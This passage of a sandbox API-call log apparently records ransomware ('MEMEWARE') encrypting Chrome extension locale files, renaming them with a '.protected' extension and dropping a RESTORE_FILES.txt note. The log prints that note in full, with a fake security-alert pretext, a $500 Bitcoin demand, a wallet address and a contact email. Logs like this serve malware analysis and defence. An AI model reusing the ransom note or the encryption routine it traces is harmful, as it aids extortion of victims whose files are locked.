out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.844] CloseHandle (hObject=0x164) returned 1 [0083.845] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.845] lstrcmpiW (lpString1="lv", lpString2="Windows") returned -1 [0083.845] lstrcmpiW (lpString1="lv", lpString2="Program Files") returned -1 [0083.845] lstrcmpiW (lpString1="lv", lpString2="Program Files (x86)") returned -1 [0083.845] lstrcmpiW (lpString1="lv", lpString2="$Recycle.bin") returned 1 [0083.845] lstrcmpiW (lpString1="lv", lpString2="System Volume Information") returned -1 [0083.845] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv") returned 150 [0083.845] lstrcmpW (lpString1="lv", lpString2=".") returned 1 [0083.845] lstrcmpW (lpString1="lv", lpString2="..") returned 1 [0083.845] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\*") returned 152 [0083.845] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.845] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.845] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.845] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.845] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.845] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.845] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\.") returned 152 [0083.845] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.845] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.845] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.845] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.845] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.845] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.845] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.845] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\..") returned 153 [0083.845] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.845] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.845] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.845] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.846] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.846] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.846] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.846] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.846] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json") returned 164 [0083.846] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.846] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.846] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.846] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.848] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json") returned 164 [0083.849] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.849] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json") returned 164 [0083.849] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.849] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json") returned 164 [0083.849] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.849] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.853] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.853] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.854] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.854] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.854] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.854] CloseHandle (hObject=0x168) returned 1 [0083.854] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.protected") returned 174 [0083.854] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.protected")) returned 1 [0083.855] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.855] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.856] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\RESTORE_FILES.txt") returned 168 [0083.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.856] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.856] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.857] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.857] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.857] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.857] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.857] CloseHandle (hObject=0x164) returned 1 [0083.857] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.857] lstrcmpiW (lpString1="ml", lpString2="Windows") returned -1 [0083.857] lstrcmpiW (lpString1="ml", lpString2="Program Files") returned -1 [0083.858] lstrcmpiW (lpString1="ml", lpString2="Program Files (x86)") returned -1 [0083.858] lstrcmpiW (lpString1="ml", lpString2="$Recycle.bin") returned 1 [0083.858] lstrcmpiW (lpString1="ml", lpString2="System Volume Information") returned -1 [0083.858] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml") returned 150 [0083.858] lstrcmpW (lpString1="ml", lpString2=".") returned 1 [0083.858] lstrcmpW (lpString1="ml", lpString2="..") returned 1 [0083.858] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\*") returned 152 [0083.858] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.858] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.858] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.858] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.858] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.858] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.858] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\.") returned 152 [0083.858] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.858] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.858] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.858] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.858] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.858] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.858] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.858] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\..") returned 153 [0083.858] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.858] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.858] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.858] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.858] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.858] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.858] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.858] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.858] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json") returned 164 [0083.858] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.858] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.858] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.858] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json") returned 164 [0083.859] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json") returned 164 [0083.859] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json") returned 164 [0083.859] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.859] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.861] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.861] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.861] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.861] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.861] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.861] CloseHandle (hObject=0x168) returned 1 [0083.862] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.protected") returned 174 [0083.862] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.protected")) returned 1 [0083.862] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.862] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.862] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\RESTORE_FILES.txt") returned 168 [0083.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.863] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.863] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.863] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.863] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.863] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.863] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 